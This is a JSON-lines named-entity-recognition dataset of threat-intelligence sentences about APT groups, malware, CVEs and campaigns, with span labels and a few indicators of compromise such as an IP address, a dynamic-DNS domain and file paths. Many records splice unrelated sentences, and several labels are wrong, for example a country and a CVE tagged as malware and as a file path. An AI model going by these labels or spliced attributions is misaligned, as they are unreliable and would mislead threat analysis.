Leafminer : Raspite .", "spans": {"ORGANIZATION: Proofpoint": [[10, 20]], "MALWARE: Marcher": [[157, 164]], "THREAT_ACTOR: Pyongyang-affiliated hackers": [[370, 398]], "ORGANIZATION: multinational companies’": [[436, 460]], "THREAT_ACTOR: Leafminer": [[477, 486]], "THREAT_ACTOR: Raspite": [[489, 496]]}, "info": {"id": "cyberner_stix_train_006407", "source": "cyberner_stix_train"}} {"text": "It is in use by the Molerats ( aka Gaza cybergang ) , a politically motivated group whose main objective , we believe , is intelligence gathering . TEMP.Veles' lateral movement activities used a publicly-available PowerShell-based tool , WMImplant .", "spans": {"THREAT_ACTOR: Molerats": [[20, 28]], "THREAT_ACTOR: Gaza cybergang": [[35, 49]], "ORGANIZATION: politically": [[56, 67]], "THREAT_ACTOR: group": [[78, 83]], "THREAT_ACTOR: TEMP.Veles'": [[148, 159]], "MALWARE: PowerShell-based tool": [[214, 235]], "MALWARE: WMImplant": [[238, 247]]}, "info": {"id": "cyberner_stix_train_006408", "source": "cyberner_stix_train"}} {"text": "] com through an upload queue . these attacks were part of a planned operation against specific targets in India . Congratulations_Jan-7.pdf : Inside , we break down the 5 most dangerous threats facing businesses this year — including LockBit and SocGholish — dissecting how they ’re delivered , where they spread , what they destroy , and the best practices to protect against them .", "spans": {"FILEPATH: Congratulations_Jan-7.pdf": [[115, 140]], "MALWARE: LockBit": [[235, 242]], "MALWARE: SocGholish": [[247, 257]]}, "info": {"id": "cyberner_stix_train_006409", "source": "cyberner_stix_train"}} {"text": "The second macro file ~de03fc12a.docm dropped includes a simple macro to execute the dropped executable .", "spans": {"FILEPATH: ~de03fc12a.docm": [[22, 37]]}, "info": {"id": "cyberner_stix_train_006410", "source": "cyberner_stix_train"}} {"text": "And that ’ s exactly what has happened recently . 
Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . The campaign appears highly targeted and delivers a backdoor we have called ' Helminth ' .", "spans": {"ORGANIZATION: Kaspersky Lab": [[50, 63]], "VULNERABILITY: Microsoft Office exploits": [[87, 112]], "MALWARE: Exploit.MSWord.CVE-2010-333": [[160, 187]], "MALWARE: Exploit.Win32.CVE-2012-0158": [[190, 217]], "MALWARE: Helminth": [[298, 306]]}, "info": {"id": "cyberner_stix_train_006411", "source": "cyberner_stix_train"}} {"text": "We didn’t start out looking for KASPERAGENT , but a file hit on one of our YARA rules for an executable designed to display a fake XLS icon – one way adversaries attempt to trick targets into thinking a malicious file is innocuous .", "spans": {"MALWARE: KASPERAGENT": [[32, 43]]}, "info": {"id": "cyberner_stix_train_006412", "source": "cyberner_stix_train"}} {"text": "This backdoor is executed using the CMD_EXECUTE command .", "spans": {}, "info": {"id": "cyberner_stix_train_006413", "source": "cyberner_stix_train"}} {"text": "This is known as a targeted attack . The Leafminer 's post-compromise toolkit suggests that Leafminer is looking for email data , files , and database servers on compromised target systems . APT33 : 192.119.15.37 mynetwork.ddns.net . 
What ’s more , two other vulnerabilities in MOVEit were found while new victims were still coming forward .", "spans": {"THREAT_ACTOR: Leafminer": [[41, 50], [92, 101]], "THREAT_ACTOR: APT33": [[191, 196]], "IP_ADDRESS: 192.119.15.37": [[199, 212]], "DOMAIN: mynetwork.ddns.net": [[213, 231]], "TOOL: MOVEit": [[278, 284]]}, "info": {"id": "cyberner_stix_train_006414", "source": "cyberner_stix_train"}} {"text": "By later August , TA505 had turned back to large attachment campaigns , primarily distributing various zipped scripts that downloaded Locky .", "spans": {"THREAT_ACTOR: TA505": [[18, 23]], "TOOL: zipped": [[103, 109]], "MALWARE: Locky": [[134, 139]]}, "info": {"id": "cyberner_stix_train_006415", "source": "cyberner_stix_train"}} {"text": "Dump data from the Viber messenger app . Another such an exceptional espionage platform is \" ProjectSauron , also known as \" Strider \" . This group has been operating in the Middle East since 2012 . Indicators of compromise help answer the question What happened while indicators of attack can help answer questions like What is happening and why A proactive approach to detection uses both IOAs and IOCs to discover security incidents or threats in as close to real time as possible .", "spans": {"SYSTEM: Viber messenger": [[19, 34]], "TOOL: ProjectSauron": [[93, 106]], "THREAT_ACTOR: Strider": [[125, 132]]}, "info": {"id": "cyberner_stix_train_006416", "source": "cyberner_stix_train"}} {"text": "The following examples were developed using a Winnti installer that was used in attacks in December 2016 .", "spans": {"MALWARE: Winnti": [[46, 52]]}, "info": {"id": "cyberner_stix_train_006417", "source": "cyberner_stix_train"}} {"text": "Instead , we downloaded and compiled the 1.2.0.0 server of the open-source Quasar RAT , having determined that this seemed likely the most similar version .", "spans": {"MALWARE: Quasar RAT": [[75, 85]]}, "info": {"id": "cyberner_stix_train_006418", "source": "cyberner_stix_train"}} {"text": 
"DustySky has been developed and used since May 2015 by Molerats ( aka \" Gaza cybergang \" ) , a terrorist group whose main objective in this campaign is intelligence gathering . On multiple dates in 2017 , TEMP.Veles struggled to execute this utility on multiple victim systems , potentially due to AV detection .", "spans": {"TOOL: DustySky": [[0, 8]], "THREAT_ACTOR: Molerats": [[55, 63]], "THREAT_ACTOR: Gaza cybergang": [[72, 86]], "THREAT_ACTOR: terrorist group": [[95, 110]], "THREAT_ACTOR: TEMP.Veles": [[205, 215]]}, "info": {"id": "cyberner_stix_train_006419", "source": "cyberner_stix_train"}} {"text": "Symantec discovered the most recent wave of Tick attacks in July 2015 , when BRONZE BUTLER compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks . To do this , it employs a number of specific commands via DNSMessenger .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: BRONZE BUTLER": [[77, 90]], "MALWARE: DNSMessenger": [[258, 270]]}, "info": {"id": "cyberner_stix_train_006420", "source": "cyberner_stix_train"}} {"text": "These emails included recruitment-themed lures and links to malicious HTML application ( HTA ) files . The malware author seemingly made unpacking the malware more difficult to slow down or even evade the antivirus engine ’s scanning process .", "spans": {"TOOL: HTML application": [[70, 86]], "MALWARE: HTA": [[89, 92]], "MALWARE: malware": [[107, 114]]}, "info": {"id": "cyberner_stix_train_006421", "source": "cyberner_stix_train"}} {"text": "downloader , Older version of CORESHELL , Sofacy .", "spans": {"MALWARE: CORESHELL": [[30, 39]], "MALWARE: Sofacy": [[42, 48]]}, "info": {"id": "cyberner_stix_train_006422", "source": "cyberner_stix_train"}} {"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . 
MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) .", "spans": {"MALWARE: slides": [[33, 39]], "VULNERABILITY: CVE-2017-8759": [[64, 77]], "TOOL: Microsoft .NET framework": [[121, 145]], "FILEPATH: MXI Player": [[148, 158]], "DOMAIN: com.mxi.videoplay": [[288, 305]]}, "info": {"id": "cyberner_stix_train_006423", "source": "cyberner_stix_train"}} {"text": "CONCLUSIONS FakeSpy was first seen in October 2017 and until recently mainly targeted East Asian countries . Notably , the group’s use of email as infection vector seems to yield success for their campaigns . ther names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon .", "spans": {"MALWARE: FakeSpy": [[12, 19]], "THREAT_ACTOR: group’s": [[123, 130]], "TOOL: email": [[138, 143]], "THREAT_ACTOR: Vixen Panda": [[238, 249]], "THREAT_ACTOR: Ke3chang": [[252, 260]], "THREAT_ACTOR: Royal APT": [[263, 272]], "THREAT_ACTOR: Playful Dragon": [[279, 293]]}, "info": {"id": "cyberner_stix_train_006424", "source": "cyberner_stix_train"}} {"text": "The attackers deploy a rare modification of the AZZY backdoor , which is used for the initial reconnaissance .", "spans": {"MALWARE: AZZY backdoor": [[48, 61]]}, "info": {"id": "cyberner_stix_train_006425", "source": "cyberner_stix_train"}} {"text": "The OnionDuke toolset also includes a dropper , an information stealer variant and multiple distinct versions of the core component that is responsible for interacting with the various modules .", "spans": {"MALWARE: OnionDuke": [[4, 13]]}, "info": {"id": "cyberner_stix_train_006426", "source": "cyberner_stix_train"}} {"text": "Wind Tre SpA - an Italian telecom operator TMCell - the state owned mobile operator in Turkmenistan Deployment to users outside Apple ’ s app store was made possible through abuse of Apple ’ s enterprise provisioning system . 
WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 . MuddyWater has recently been targeting victims likely from Lebanon and Oman , while leveraging compromised domains , one of which is owned by an Israeli web developer .", "spans": {"ORGANIZATION: Wind Tre SpA": [[0, 12]], "ORGANIZATION: TMCell": [[43, 49]], "ORGANIZATION: Apple": [[128, 133], [183, 188]], "TOOL: WannaCry": [[226, 234]], "VULNERABILITY: EternalBlue": [[270, 281]], "THREAT_ACTOR: Shadow Brokers": [[311, 325]], "THREAT_ACTOR: MuddyWater": [[347, 357]]}, "info": {"id": "cyberner_stix_train_006427", "source": "cyberner_stix_train"}} {"text": "Kaspersky first became aware of BlackOasis’ activities in May 2016 , while investigating another Adobe Flash zero day . Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: BlackOasis’": [[32, 43]], "VULNERABILITY: zero day": [[109, 117]], "VULNERABILITY: exploit": [[130, 137], [194, 201]], "FILEPATH: EternalRomance": [[145, 159]], "FILEPATH: EternalSynergy": [[173, 187]], "FILEPATH: CVE-2017-0143": [[206, 219]]}, "info": {"id": "cyberner_stix_train_006428", "source": "cyberner_stix_train"}} {"text": "Using these tactics Scarlet Mimic can directly target previously identified individuals ( spear phishing ) as well as unidentified individuals who are interested in a specific subject ( watering hole ) . 
In this blog , we look at the Winnti malware implant as used by two known activity groups BARIUM and LEAD .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[20, 33]], "MALWARE: Winnti": [[234, 240]], "MALWARE: malware": [[241, 248]], "THREAT_ACTOR: BARIUM": [[294, 300]]}, "info": {"id": "cyberner_stix_train_006429", "source": "cyberner_stix_train"}} {"text": "In most cases , these click fraud apps were uninstalled by the users , probably due to the low quality of the apps . SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire . The threat actors achieved an initial foothold into the infrastructure via phishing email that convinced victims to install the Xyligan remote access Trojan ( RAT ) on a system . Then , it copies the system file “ rundll32.exe ” to the same directory with name “ ntuser.exe ” and runs it with “ ntuser.bin ” as a parameter , effectively loading the malicious DLL file .", "spans": {"ORGANIZATION: SPEAR": [[117, 122]], "TOOL: PassCV samples": [[141, 155]], "TOOL: RAT": [[216, 219]], "TOOL: Netwire": [[227, 234]], "TOOL: phishing email": [[312, 326]], "MALWARE: Xyligan": [[365, 372]], "MALWARE: Trojan": [[387, 393]], "MALWARE: the malicious DLL file": [[582, 604]]}, "info": {"id": "cyberner_stix_train_006430", "source": "cyberner_stix_train"}} {"text": "Next , ZeroT uses HTTP beacons to transmit information about the infected system to the command and control ( C&C ) .", "spans": {"MALWARE: ZeroT": [[7, 12]], "TOOL: command and control": [[88, 107]], "TOOL: C&C": [[110, 113]]}, "info": {"id": "cyberner_stix_train_006431", "source": "cyberner_stix_train"}} {"text": "For example , some of the more advanced banking Trojans now offer features such as a back-connect proxy , screen-streaming and even remote control . 
SectorJ04 was recently confirmed to use additional backdoor called AdroMut and FlowerPippi , which is used to install other backdoor such as FlawedAmmy RAT on behalf of the MSI file , or to collect system information and send it to the attacker’s server . In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 — at least based on the file properties of the decoy documents they've been sending to their targets .", "spans": {"THREAT_ACTOR: SectorJ04": [[149, 158]], "TOOL: AdroMut": [[216, 223]], "TOOL: FlowerPippi": [[228, 239]], "THREAT_ACTOR: attacker’s": [[385, 395]], "THREAT_ACTOR: REDBALDKNIGHT": [[415, 428]], "FILEPATH: decoy documents": [[539, 554]]}, "info": {"id": "cyberner_stix_train_006432", "source": "cyberner_stix_train"}} {"text": "Potential targets such as Hamas who controls the Gaza strip and counts Mazen Fuqaha and Yahya al-Sinwar as members , Israel which is accused of involvement in the assassination of Mazen Fuqaha , and the Fatah party of which the Prime Minister and President of the Palestinian Authority are members .", "spans": {"ORGANIZATION: Hamas": [[26, 31]], "ORGANIZATION: Fatah party": [[203, 214]], "ORGANIZATION: Palestinian Authority": [[264, 285]]}, "info": {"id": "cyberner_stix_train_006433", "source": "cyberner_stix_train"}} {"text": "Capture real-time voice calls in any network or app by hooking into the “ mediaserver ” system service RCSAndroid in the Wild Our analysis reveals that this RCSAndroid ( AndroidOS_RCSAgent.HRX ) has been in the wild since 2012 . In some cases , the attackers used the Society for Worldwide Interbank Financial Telecommunication ( SWIFT ) network to transfer money to their accounts . shown after the First Block . 
This sample works in tandem with PIEHOP , which sets up the execution .", "spans": {"MALWARE: RCSAndroid": [[103, 113], [157, 167]], "THREAT_ACTOR: attackers": [[249, 258]], "TOOL: Worldwide Interbank Financial Telecommunication": [[280, 327]], "TOOL: SWIFT": [[330, 335]]}, "info": {"id": "cyberner_stix_train_006434", "source": "cyberner_stix_train"}} {"text": "There is no way to access the original app again even if victims terminate the overlay process and reopen app , until credit card ( name , number , expiry date , security code ) and/or bank information ( PIN , VBV passcode , date of birth , etc . The Plead malware is a backdoor which , according to Trend Micro , is used by the BlackTech group in targeted attacks . The term zero-day is indicative of a software flaw that remains unknown to the software ’s creator . Cyclops Blink can use non - standard ports for C2 not typically associated with HTTP or HTTPS traffic.[10 ] DarkVishnya used ports 5190 and 7900 for shellcode listeners , and 4444 , 4445 , 31337 for shellcode C2.[11 ]", "spans": {"TOOL: Plead malware": [[251, 264]], "TOOL: backdoor": [[270, 278]], "ORGANIZATION: Trend Micro": [[300, 311]], "VULNERABILITY: zero-day": [[376, 384]], "MALWARE: Cyclops Blink": [[468, 481]], "MALWARE: DarkVishnya": [[576, 587]]}, "info": {"id": "cyberner_stix_train_006435", "source": "cyberner_stix_train"}} {"text": "Command Arguments DOWNLOAD_LIST C:\\ProgramData\\Office\\MS\\out.txt , C:\\ProgramData\\Office\\MS\\text.txt .", "spans": {"FILEPATH: C:\\ProgramData\\Office\\MS\\out.txt": [[32, 64]], "FILEPATH: C:\\ProgramData\\Office\\MS\\text.txt": [[67, 100]]}, "info": {"id": "cyberner_stix_train_006436", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //nttdocomo-qaw [ . In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM , JHUHUGIT , AZZY and a few others . 
The overall attack leverages several different approaches , which are popular techniques amongst red teamers , espionage focused adversaries , and large scale criminal campaigns . Adversaries may utilize many different protocols , including those used for web browsing , transferring files , electronic mail , or DNS .", "spans": {"THREAT_ACTOR: Sofacy group": [[47, 59]], "TOOL: CORESHELL": [[130, 139]], "TOOL: SPLM": [[142, 146]], "TOOL: JHUHUGIT": [[149, 157]], "TOOL: AZZY": [[160, 164]], "THREAT_ACTOR: Adversaries": [[364, 375]]}, "info": {"id": "cyberner_stix_train_006437", "source": "cyberner_stix_train"}} {"text": "Of the 10 million people who downloaded HummingBad-contaminated apps , an estimated 286,000 of them were located in the US . PapaAlfa is believed to be one of the proxy malware components that the Lazarus Group uses to hide the true command and control server ( s ) for operations . One Shamoon victim in Saudi Arabia had recently also been attacked by Elfin and had been infected with the Stonedrill malware ( Trojan.Stonedrill ) used by Elfin . 
When CrowdStrike researchers later reproduced the attack , events were present in CozyDuke - also known as CozyBear , CozyCar and Office Monkeys ( among others ) , and whose activity appears to align with advanced persistent threat APT29 - is a threat actor which came to prominence in 2014 when it is believed to have staged a series of precise attacks on high profile targets including the US White House , Department of State and the Democratic National Committee .", "spans": {"MALWARE: HummingBad-contaminated": [[40, 63]], "TOOL: PapaAlfa": [[125, 133]], "THREAT_ACTOR: Lazarus Group": [[197, 210]], "THREAT_ACTOR: Shamoon": [[287, 294]], "THREAT_ACTOR: Elfin": [[353, 358], [439, 444]], "MALWARE: Stonedrill": [[390, 400]], "MALWARE: Trojan.Stonedrill": [[411, 428]], "ORGANIZATION: CrowdStrike researchers": [[452, 475]], "MALWARE: CozyDuke": [[529, 537]], "MALWARE: CozyBear": [[554, 562]], "MALWARE: CozyCar": [[565, 572]], "MALWARE: Office Monkeys": [[577, 591]], "THREAT_ACTOR: APT29": [[679, 684]], "THREAT_ACTOR: threat actor": [[692, 704]], "ORGANIZATION: US White House": [[839, 853]], "ORGANIZATION: Department of State": [[856, 875]], "ORGANIZATION: Democratic National Committee": [[884, 913]]}, "info": {"id": "cyberner_stix_train_006438", "source": "cyberner_stix_train"}} {"text": "At a high level , hot patching can transparently apply patches to executables and DLLs in actively running processes , which does not happen with traditional methods of code injection such as CreateRemoteThread or WriteProcessMemory . 
This campaign , first observed in 2010 , is believed to be operated by a well-funded group given how it appeared to have purchased the source code of the BIFROST backdoor , which the operators enhanced and created other tools from .", "spans": {"MALWARE: CreateRemoteThread": [[192, 210]], "MALWARE: WriteProcessMemory": [[214, 232]]}, "info": {"id": "cyberner_stix_train_006439", "source": "cyberner_stix_train"}} {"text": "Matters pertaining to the Israeli-Palestinian Conflict : Some of the documents in this campaign reference different aspects of the Israeli-Palestinian conflict , and the efforts for ceasefire and peace processes between the Israelis and the Palestinians , including the latest peace plan made by President Donald Trump and Senior Advisor to the President of the United States Jared Kushner .", "spans": {}, "info": {"id": "cyberner_stix_train_006440", "source": "cyberner_stix_train"}} {"text": "bde7847487125084f9e03f2b6b05adc3 2 v3.12s 2560942bb50ee6e6f55afc495d238a12 2 v3.18s It ’ s interesting that the issuer “ Sun ” matches the “ Sun1 ” and “ Sun2 ” identifiers of infected devices from the FTP server , suggesting they may be test devices . Our investigation into this campaign reveals that the actor used multiple malware implants , including an unknown implant with capabilities similar to Bankshot . This was quickly followed 15 seconds later by the installation of a credential dumping to csidl_profile\\appdata\\roaming\\microsoft\\credentials\\dwm32.exe , and the execution of powershell commands via PowerShell Empire , a freely available post-exploitation framework , to bypass logging on the infected machine . 
A clever example was ‘ Office Monkeys LOL Video.zip ’ .", "spans": {"THREAT_ACTOR: actor": [[307, 312]], "TOOL: Bankshot": [[404, 412]], "FILEPATH: csidl_profile\\appdata\\roaming\\microsoft\\credentials\\dwm32.exe": [[505, 566]], "TOOL: powershell": [[590, 600]], "TOOL: PowerShell Empire": [[614, 631]]}, "info": {"id": "cyberner_stix_train_006441", "source": "cyberner_stix_train"}} {"text": "The CrowdStrike Falcon Intelligence™ team 's tracking of MYTHIC LEOPARD began in late 2016 , when evidence of an attack surfaced against a victim based in India and working in the hospitality sector . When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer .", "spans": {"ORGANIZATION: CrowdStrike Falcon Intelligence™": [[4, 36]], "ORGANIZATION: hospitality sector": [[180, 198]], "MALWARE: Word": [[233, 237]], "ORGANIZATION: Microsoft": [[295, 304]], "VULNERABILITY: CVE-2015-2545": [[348, 361]], "THREAT_ACTOR: attacker": [[395, 403]]}, "info": {"id": "cyberner_stix_train_006442", "source": "cyberner_stix_train"}} {"text": "Once the malware can use accessibility services , it has the ability to operate as a keylogger and can retrieve notifications about other installed applications and content of open windows . One hour later , Bemstour was used against an educational institution in Belgium . 
Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called \" Rocket Kitten \" ( AKA Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish ) as well as an older attack campaign called Newscasters .", "spans": {"MALWARE: Bemstour": [[208, 216]], "MALWARE: Belgium": [[264, 271]], "THREAT_ACTOR: Rocket Kitten": [[408, 421]], "THREAT_ACTOR: Operation Saffron Rose": [[430, 452]], "THREAT_ACTOR: Ajax Security Team": [[455, 473]], "THREAT_ACTOR: Operation Woolen-Goldfish": [[476, 501]]}, "info": {"id": "cyberner_stix_train_006443", "source": "cyberner_stix_train"}} {"text": "That said , so as to hinder detection of new versions , the Trojan ’ s APK file and the C & C server domains are changed regularly , and the Trojan download links are often one-time-use . this SWC was used to specifically target Turkish . Trend Micro™ XGen™ security provides high-fidelity machine learning that can secure the gateway and endpoints , and protect physical , virtual , and cloud workloads . Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality , or without the logical preconditions to trigger their expected function .", "spans": {"TOOL: SWC": [[193, 196]], "TOOL: Trend Micro™ XGen™": [[239, 257]]}, "info": {"id": "cyberner_stix_train_006445", "source": "cyberner_stix_train"}} {"text": "A few days ago , Symantec discovered a new document that appears to be part of the ongoing BlackEnergy APT group attacks against Ukraine . Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails . The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . 
Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.exe with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . Since at least 2011 , these hackers have been using malware to spy on corporate networks . Hackers are targeting high-tech companies as well as chemical and pharmaceutical companies . The hackers will map a company’s network and look for strategically favorable locations for placing their malware . The corporation conrms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions.” Henkel claims that a very small portion” of its worldwide IT systems had been aected — the systems in Germany . A BASF spokeswoman tells us in an email that in July 2015 , hackers had successfully overcome the rst levels” of defense . The tool was written by sta of Thyssenkrupp , because the industrial giant—company number eleven—had been spied on by Winnti . Hackers are charged with spying on a manufacturer of gas turbines . The Hong Kong government was spied on by the Winnti hackers . Komplex is a backdoor that has been used by APT28 on OS X and appears to be developed in a similar manner to XAgentOSX . While OceanLotus’ targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam . NewsBeef attacks against Saudi Arabian organizations and individuals are likely to continue . Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the APT10 during the compromise and was able to attribute data that was placed into it as being owned by Visma . Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe . 
These RAT families are discussed in Novetta’s other report on the Lazarus Group’s RAT and Staging capabilities . \bMagic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . \bSince at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a Cyber Espionage operation to collect information from defense , aerospace and petrochemical organizations . \bCTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash . \bCTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering . \bCharacterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East , as well as across Europe and in the United States . These malware families have a rich history of being used in many targeted attacks against government and private organizations . The activity surfaced in Southeast Asia , a region where APT10 frequently operates . The samples we analyzed originated from the Philippines . APT10 frequently targets the Southeast Asia region . Both of the loader’s variants and their various payloads that enSilo analyzed share similar Tactics , Techniques , and Procedures and code associated with APT10 . Typically , APT10 tends to employ a namesquatting scheme in their domains that aims to confuse the observer by posing as a legitimate domain . Also , the certificate embedded in the Quasar sample was issued at 22.12.2018 , which correlates with the file’s compilation date . 
Over the past three months , Recorded Future’s Insikt Group has observed an increase in APT33’s also known as Elfin infrastructure building and targeting activity , and on June 21 , 2019 , Yahoo . News reported that the U.S. Cyber Command launched cyberattacks on an Iranian spy group . Iranian state-sponsored threat actor APT33 has been conducting cyberespionage activity since at least 2013 , predominantly targeting nations in the Middle East , but also notably targeting U.S. , South Korean , and European commercial entities across a wide variety of sectors . Our research found that APT33 , or a closely aligned threat actor , continues to conduct and prepare for widespread cyberespionage activity , with over 1 , 200 domains used since March 28 , 2019 and with a strong emphasis on using commodity malware . The targeting of mainly Saudi Arabian organizations across a wide variety of industries aligns with historical targeting patterns for the group , which appear undeterred following previous exposés of their activity . Towards the end of April 2019 , we tracked down what we believe to be new activity by APT10 , a Chinese Cyber Espionage group . Almost 60% of the suspected APT33 domains that were classified to malware families related to njRAT infections , a RAT not previously associated with APT33 activity . Other commodity RAT malware families , such as AdwindRAT and RevengeRAT , were also linked to suspected APT33 domain activity . APT33 is an Iranian state-sponsored threat actor that has engaged in cyberespionage activities since at least 2013 . Western and Saudi organizations in industries that have been historically targeted by APT33 should be monitoring geopolitical developments and increasing the scrutiny of operational security controls focusing on detection and remediation of initial unauthorized access , specifically from phishing campaigns , webshells . 
Symantec’s Elfin report denoted additional targeting of the engineering , chemical , research , finance , IT , and healthcare sectors . We assess that the recent reporting on links between the Nasr Institute and Kavosh Security Group , as well as technical and persona analysis , overlaps among APT33 , APT35 , and MUDDYWATER , and is probably a result of the tiered structure that Iran utilizes to manage cyber operations . Recorded Future has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) . FireEye also noted in their 2017 report that the online handle xman_1365_x , ” found within the PDB path in an APT33 TURNEDUP backdoor sample , belonged to an individual at the Nasr Institute . Recorded Future’s Insikt Group has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) . Based on this information , it is possible that upon the exposure of the Nasr Institute as a front for Iranian state-sponsored offensive cyber activity , employees transitioned over to other entities , such as Kavosh , to protect their identities and minimize further exposure . Insikt Group researchers used proprietary methods , including Recorded Future Domain Analysis and Recorded Future Network Traffic Analysis , along with other common analytical approaches , to profile recently reported Iranian threat actor APT33’s domain and hosting infrastructure in an effort to identify recent activity . Insikt Group enumerated all domains reported as being used by APT33 since January 2019 . PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . 
Using data from Recorded Future Domain Analysis and combining it with data derived from Recorded Future Network Traffic Analysis , Insikt Group researchers were able to identify a small selection of likely targeted organizations impacted by suspected APT33 activity . Following the exposure of a wide range of their infrastructure and operations by Symantec earlier this year , we discovered that APT33 , or closely aligned actors , reacted by either parking or reassigning some of their domain infrastructure . Since late March , suspected APT33 threat actors have continued to use a large swath of operational infrastructure , well in excess of 1 , 200 domains , with many observed communicating with 19 different commodity RAT implants . While we haven’t observed a widespread targeting of commercial entities or regional adversaries like in previously documented APT33 operations , the handful of targeted organizations that we did observe were mainly located in Saudi Arabia across a range of industries , indicating ongoing targeting aligned with geopolitical aims . The zip contained a sample of the Poison Ivy malware which is also known to be used by APT10 . The new malware families , which we will examine later in this post , show APT34 relying on their PowerShell development capabilities , as well as trying their hand at Golang . Additionally , with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE) , Intelligence , and Advanced Practices teams , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 . This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however , we believe APT34's strongest interest is gaining access to financial , energy , and government entities . 
Additionally , with the assistance of FireEye Labs , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 . APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014 . This CPE was created to ensure our customers are updated with new discoveries , activity and detection efforts related to this campaign , along with other recent activity from Iranian-nexus threat actors to include APT33 , which is mentioned in this updated FireEye blog post . On June 19 , 2019 , FireEye’s Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances . A backdoor that communicates with a single command and control server using HTTP GET and POST requests , TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . FireEye’s Advanced Practices and Intelligence teams were able to identify additional artifacts and activity from the APT34 actors at other victim organizations . Of note , FireEye discovered two additional new malware families hosted at this domain , VALUEVAULT and LONGWATCH . This tool was previously observed during a Mandiant incident response in 2018 and , to date , solely utilized by APT34 . PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . FireEye detects this activity across our platforms , including named detection for TONEDEAF , VALUEVAULT , and LONGWATCH . Several spear-phishing campaigns attributed to Carbanak , all occurring between March and May 2018 , were analyzed by security researchers in 2018 . One of the most prolific APT-style cyberattacks , specifically targeting the financial sector , is known as Carbanak . 
Discovered in 2014 , the campaign quickly gained notoriety after compromising the security systems of 100 banks in 40 countries and stealing up to $1 billion in the process . The same group is believed to have also been using the Cobalt Strike framework to run sophisticated campaigns , plotting and performing financial heists of financial institutions . Banks in countries such as Russia , the United Kingdom , the Netherlands , Spain , Romania , Belarus , Poland , Estonia , Bulgaria , Georgia , Moldova , Kyrgyzstan , Armenia , Taiwan and Malaysia have allegedly been targeted with spearphishing emails , luring victims into clicking malicious URLs and executing booby-trapped documents . A Carbanak trademark in cyberattacks remains the use of Cobalt Strike – a powerful pentesting tool designed for exploiting and executing malicious code , simulating post-exploitation actions of advanced threat actors – which allows them to infiltrate the organization , move laterally , exfiltrate data , and deploy anti-forensic and evasion tools . However , this action doesn’t appear to have made a dent in the cybercriminal organization , as subsequent spear-phishing campaigns seem to have been reported from March until May 2018 . Bitdefender’s forensics and investigation team was contacted to look into a security incident that started in May 2018 with an email received by two of the bank’s employees . The Carbanak group , which has a long track record of compromising infrastructure belonging to financial institutions , is still active . Its purpose remains to manipulate financial assets , such as transferring funds from bank accounts or taking over ATM infrastructures and instructing them to dispense cash at predetermined time intervals . If the attack had succeeded , it would have given hackers control over the ATM network , while money mules would have been standing by the ATM machines at pre-set time intervals to cash them out . 
